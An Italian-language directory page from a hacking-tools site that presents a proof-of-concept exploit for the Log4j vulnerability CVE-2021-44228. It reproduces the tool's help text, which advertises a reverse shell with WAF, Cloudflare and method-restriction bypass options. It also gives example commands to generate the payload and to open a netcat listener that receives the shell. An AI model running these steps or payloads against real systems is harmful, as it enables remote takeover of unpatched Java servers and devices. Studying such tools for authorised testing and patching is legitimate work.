Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-shell-csw — Un exploit Proof-of-Concept per la vulnerabilità CVE-2021-44228. | Kitploit
Strumenti/GitHubGitHub/cybersecurityworks553/log4j-shell-csw
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFCommand and Control
GitHubcybersecurityworks553/log4j-shell-csw

log4j-shell-csw

Un exploit Proof-of-Concept per la vulnerabilità CVE-2021-44228.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
824 anni faNon ancora revisionato

Exploit Semplice per Log4j

Un Exploit Proof-of-Concept per la vulnerabilità CVE-2021-44228.

Log4j, che viene utilizzato per registrare informazioni di sicurezza e prestazioni, ha un impatto su oltre 3 miliardi di dispositivi che utilizzano Java in una varietà di servizi consumer e aziendali, siti web e applicazioni, oltre a dispositivi medici e sistemi di supporto.
Nota: questo non è un exploit "punta e clicca". Il payload trigger iniziale verrà generato, ma iniettarlo nel posto appropriato (es. header HTTP/chat/ecc.) sarà compito dell'utente.

Prerequisiti

  • python3
  • pip install -r requirements.txt
  • Installa jdk1.8.0_20 e aggiungi la cartella bin alla variabile d'ambiente
root@kitploit:~
usage: python CVE-2021-44228-exploit.py --help 
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html

usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]

log4shell Reverse shell exploit

optional arguments:
  -h, --help            show this help message and exit
  --userip userip       Enter IP for LDAPRefServer & Shell
  --webport webport     listener port for HTTP port
  --lport lport         Netcat Port
  -b bypass, --bypass bypass
                        Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
                        ${lower:x} method restriction bypass
Esempio:
  1. Esegui lo script per sistemi Linux con payload bypass del metodo
root@kitploit:~
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods

2) esegui netcat sulla porta 9001 nella tua macchina locale

root@kitploit:~
nc -lvnp 9001
  1. Copia il payload 'Try me' per bypassare la restrizione dei metodi e usalo nella variabile di input per ottenere una shell in netcat
    Nota: Se non viene scelto alcun bypass, usa il payload 'Send me'

Riferimenti

  • https://akashpatil.me/log4j-guide-book.html
  • https://github.com/kozmer/log4j-shell-poc
Scarica lo strumento